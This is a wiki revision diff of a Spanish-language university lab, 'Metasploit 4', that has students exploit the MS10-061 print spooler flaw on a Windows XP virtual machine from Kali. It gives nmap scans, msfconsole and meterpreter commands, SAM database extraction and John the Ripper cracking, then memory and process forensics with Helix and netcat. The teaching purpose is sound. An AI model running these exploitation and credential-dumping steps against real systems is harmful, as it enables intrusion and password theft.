sad:t2:m4
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
sad:t2:m4 [2018/12/17 14:11] – José Manuel Guallar | sad:t2:m4 [2019/01/10 14:40] (actual) – José Manuel Guallar | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
====== Metasploit 4 ====== | ====== Metasploit 4 ====== | ||
- | Escenario | + | **Escenario** |
¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ¿Alguna vez ha oído hablar de cómo alguien fue capaz de conectarse a una impresora compartida y más tarde obtener el privilegio de administrador de esa máquina? Bueno, los atacantes pueden usar la técnica que Stuxnet para obtener privilegios para los servidores Windows XP y Windows 2003 que comparten impresoras. Esta lección proporcionará (1) el reconocimiento para ver esta vulnerabilidad potencial, (2) realizar la explotación, | ||
- | ¿Qué es Helix? | + | ** ¿Qué es Helix?** |
Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | Helix es una distribución personalizada del CD de Knoppix Live Linux. Se centra en la respuesta de incidentes y la informática forense. Helix es algo más que un CD de arranque en vivo. Con Helix puedes arrancar en un robusto entorno Linux que incluye (1) un kernel Linux personalizable, | ||
Línea 15: | Línea 15: | ||
El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | El directorio de trabajo en ese momento es %SystemRoot%system32. Un atacante puede especificar cualquier nombre de archivo, incluyendo rutas transversales o completas de directorios. Al enviar solicitudes WritePrinter, | ||
- | Referencias | + | **Referencias** |
* http:// | * http:// | ||
* https:// | * https:// | ||
- | Requisitos para hacer esta practica | + | **Requisitos para hacer esta practica** |
* Maquina XP | * Maquina XP | ||
* Kali | * Kali | ||
- | Post requisitos | + | ** Post requisitos** |
* Volatility | * Volatility | ||
- | Que haremos en esta practica | + | **Que haremos en esta practica** |
* Descargar Helix2008R1 | * Descargar Helix2008R1 | ||
Línea 71: | Línea 71: | ||
Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | Utilizamos el nmap TCP SYN Scan (-sS) y UDP (-sU) para buscar rápidamente en el XP los puertos de NetBios 137 a 139 y 445. Tambien usamos -= (Footprint del sistema operativo), para que nos diga que sistema operativo estamos | ||
- | NetBIOS es un acrónimo de sistema de entrada/ | + | **NetBIOS** es un acrónimo de sistema de entrada/ |
Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | Se utiliza el puerto TCP 445 para acceso directo de red de Microsoft TCP/IP sin necesidad de una capa de NetBIOS. El protocolo SMB (Server Message Block) se utiliza entre otras cosas para archivos compartidos en Windows NT / 2K/ | ||
Línea 95: | Línea 95: | ||
{{: | {{: | ||
- | + | ** | |
- | Acceso a los recursos SMB | + | Acceso a los recursos SMB** |
< | < | ||
Línea 120: | Línea 120: | ||
msfconsole | msfconsole | ||
search ms10_061 | search ms10_061 | ||
- | use exploit/ | + | use exploit/ |
info | info | ||
set PAYLOAD windows/ | set PAYLOAD windows/ | ||
Línea 177: | Línea 177: | ||
(/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | (/fi) es un filtro; y ( "PID EQ " 1876 ") filtrar o mostrar sólo un PID que coincida con 196. | ||
- | netstat muestra conexiones de red. | + | **netstat** muestra conexiones de red. |
(-n) muestra direcciones y números de puerto en forma numérica | (-n) muestra direcciones y números de puerto en forma numérica | ||
Línea 185: | Línea 185: | ||
(-o) muestra el identificador de proceso propietario asociado a cada conexión. | (-o) muestra el identificador de proceso propietario asociado a cada conexión. | ||
- | 21 | + | {{: |
- | 22 | + | |
+ | |||
+ | {{: | ||
===== Archivos Forenses Basicos ===== | ===== Archivos Forenses Basicos ===== | ||
< | < | ||
- | tasklist > forensics_tasklist.txt | + | tasklist > forense_tasklist.txt |
- | netstat -nao > forensics_netstat.txt | + | netstat -nao > forense_netstat.txt |
- | dir > forensics_dir.txt | + | dir > forense_dir.txt |
exit | exit | ||
</ | </ | ||
Línea 202: | Línea 204: | ||
Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | Comando 4, salimos del shell de comandos y vuelva a la solicitud de meterpreter. | ||
- | 23 | ||
- | Obtener la base de datos SAM | + | {{: |
+ | ** | ||
+ | Obtener la base de datos SAM** | ||
[[https:// | [[https:// | ||
Línea 215: | Línea 218: | ||
</ | </ | ||
- | 24 | + | |
+ | {{: | ||
< | < | ||
Línea 222: | Línea 226: | ||
</ | </ | ||
- | 25 | ||
- | Preparacion | + | {{: |
+ | |||
+ | **Preparacion | ||
< | < | ||
Línea 232: | Línea 237: | ||
</ | </ | ||
- | Se crea un directorio | + | Se crea un directorio |
- | Se cambia el directorio en/ | + | Se cambia el directorio en/forense /ms10_061. |
Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | Creamos un escucha netcat (-l) en el puerto (-p) 8888 en modo detallado extremo (-vvv) redirigir (>) salida en un archivo (ms10_016.dd) | ||
- | 26 | + | {{: |
+ | ===== Memoria del XP ===== | ||
- | Memoria del XP | ||
Click en CD/DVD(IDE) | Click en CD/DVD(IDE) | ||
- | Seleccionamos la ISO : Helix2008R1.iso | ||
- | 27 | + | {{: |
Aceptamos pinchamos en la camara | Aceptamos pinchamos en la camara | ||
Línea 256: | Línea 261: | ||
* puerto 8888 | * puerto 8888 | ||
- | 28 | + | |
+ | {{: | ||
En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | En el momento que pulsamos start se empieza la captura de la memoria del xp a través de la red con la red netcat que se ejecuta en Kali | ||
- | 29 | + | |
+ | {{: | ||
La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | La pantalla negra desaparece cuando se haya terminado de copiar toda la memoria | ||
Línea 270: | Línea 277: | ||
vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | vemos que una ver terminado nos indica la cantidad de bits de memoria capturada | ||
- | 30 | + | |
+ | {{: | ||
Descarga de los ficheros forenses en el meterpreter | Descarga de los ficheros forenses en el meterpreter | ||
Línea 277: | Línea 285: | ||
< | < | ||
pwd | pwd | ||
- | download C: | + | download C: |
- | download C: | + | download C: |
- | download C: | + | download C: |
- | download C: | + | download C: |
</ | </ | ||
- | WRvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador | + | RvOYs3UqrJqo7a.exe en vuestro caso el que se haya creado en el ordenador |
- | 31 | + | |
+ | {{: | ||
En otra ventana de terminal ejecutaremos un John The Ripper | En otra ventana de terminal ejecutaremos un John The Ripper | ||
Línea 298: | Línea 307: | ||
</ | </ | ||
- | 32 | ||
- | |||
- | 33 | ||
+ | {{: | ||
+ | {{: | ||
+ | print de pantalla final que hay que entregar | ||
+ | < | ||
+ | ls -lrta | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplazalo por tu PID | ||
+ | grep " | ||
+ | grep " | ||
+ | # Reemplaza (RvOYs3UqrJqo7a.exe) por tu programa malicioso | ||
+ | date | ||
+ | echo "Tu nombre" | ||
+ | </ | ||
sad/t2/m4.1545055890.txt.gz · Última modificación: (editor externo)